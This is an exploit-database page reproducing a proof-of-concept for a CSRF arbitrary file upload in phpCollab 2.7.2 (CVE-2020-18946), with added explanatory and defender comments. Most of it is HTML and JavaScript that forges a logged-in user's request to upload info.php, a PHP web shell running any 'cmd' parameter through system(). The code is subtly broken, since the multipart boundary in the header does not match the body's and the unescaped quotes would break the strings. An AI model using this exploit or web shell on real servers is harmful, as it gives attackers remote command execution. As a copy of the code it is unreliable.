





phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script

CVE Category Price Severity
CVE-2020-18946 CWE-352 $5000 Critical
Author Risk Exploitation Type Date
Yash Sanghani High Remote 2020-04-27
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020040163

Below is a copy:

phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script
#/
#* phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script
#* Author  : Trung Le
#* Tutorial Video : https://youtu.be/BLFbUJ4n8hY
#* Twitter : @lethanhtrungdbp
#* Facebook : fb.com/c0nc4nh0
#/
<!DOCTYPE html>
<html>
<title>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</title>
<body>

<script type="text/javascript">


// upload(): builds and sends the single forged request this PoC relies on.
//
// What the code shows:
//   - a POST to clients/editclient.php?action=add (presumably the form that
//     adds a client record), sent with withCredentials set so the browser is
//     asked to attach the logged-in user's cookies;
//   - a hand-written multipart body holding the client form fields and one
//     file part named "upload" with filename "info.php", whose PHP content
//     hands the "cmd" query parameter to system();
//   - no field in the body looks like an anti-CSRF token, which matches the
//     CWE-352 classification given on the page.
//
// Defender notes (general hardening, not taken from a vendor fix; confirm
// against the phpCollab release you run):
//   - require a CSRF token on state-changing actions such as editclient.php
//     and set SameSite on the session cookie;
//   - validate uploaded files server-side (allow-list of expected types and
//     extensions) and store them where the web server will not execute PHP;
//   - for detection, look for POSTs to editclient.php?action=add whose
//     Origin/Referer is not the application itself, for newly created .php
//     files in the application's upload directory, and for requests to
//     uploaded files that carry a cmd= parameter.
function upload(){
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "/phpcol/clients/editclient.php?action=add&", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2273947705998934173936604226");
  // Ask the browser to include cookies with the request.
  xhr.withCredentials = true;
  // Multipart body written out by hand: the client form fields come first,
  // the file part last.
  var body = "-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n" +
"\r\n" +
"100000000\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="owner"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="name"\r\n" +
"\r\n" +
"100\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="address"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="phone"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="url"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="email"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="comments"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="hourly_rate"\r\n" +
"\r\n" +
"0.00\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
// File part: field "upload", filename "info.php". Everything from here to
// the closing boundary is the uploaded file's content.
"Content-Disposition: form-data; name="upload"; filename="info.php"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"<HTML><BODY>\r\n" +
"<FORM METHOD="GET" NAME="myform" ACTION="">\r\n" +
"<INPUT TYPE="text" NAME="cmd">\r\n" +
"<INPUT TYPE="submit" VALUE="Send">\r\n" +
"</FORM>\r\n" +
"<pre>\r\n" +
"<?\r\n" +
"if($_GET['cmd']) {\r\n" +
"  system($_GET['cmd']);\r\n" +
"  }\r\n" +
"?>\r\n" +
"</pre>\r\n" +
"</BODY></HTML>\r\n" +
"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750--\r\n";
  // Copy the body into a byte array, one char code per element, and send it
  // as a Blob. The for loop has no braces, so only the assignment repeats;
  // xhr.send() runs once after the loop despite its indentation.
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i); 
    xhr.send(new Blob([aBody]));
}

</script>

<!-- PoC harness UI: a heading, one button and an output frame. The button's onclick handler calls upload(); the form has action="#" and no submit control. -->
<h3>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</h3>

<form action="#">
  <button type="button" onclick=upload()>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</button>
</form><br />
<!-- NOTE(review): nothing in the visible markup or script targets this iframe (name "ZSL_iframe"); as listed it only renders its srcdoc text. -->
<iframe
  style="border:2px;border-style:dashed;color:#d3d3d3"
  srcdoc="command output frame"
  width="700" height="600"
  name="ZSL_iframe">
</iframe>
<br />
<!-- NOTE(review): "ZSL-2016-5328" does not match the CVE-2020-18946 identifier shown in the page header; it looks like a leftover from the template this PoC was adapted from, so do not use it to look this issue up. -->
<font size="2" color="#d3d3d3">ZSL-2016-5328</font>

</body>
</html>
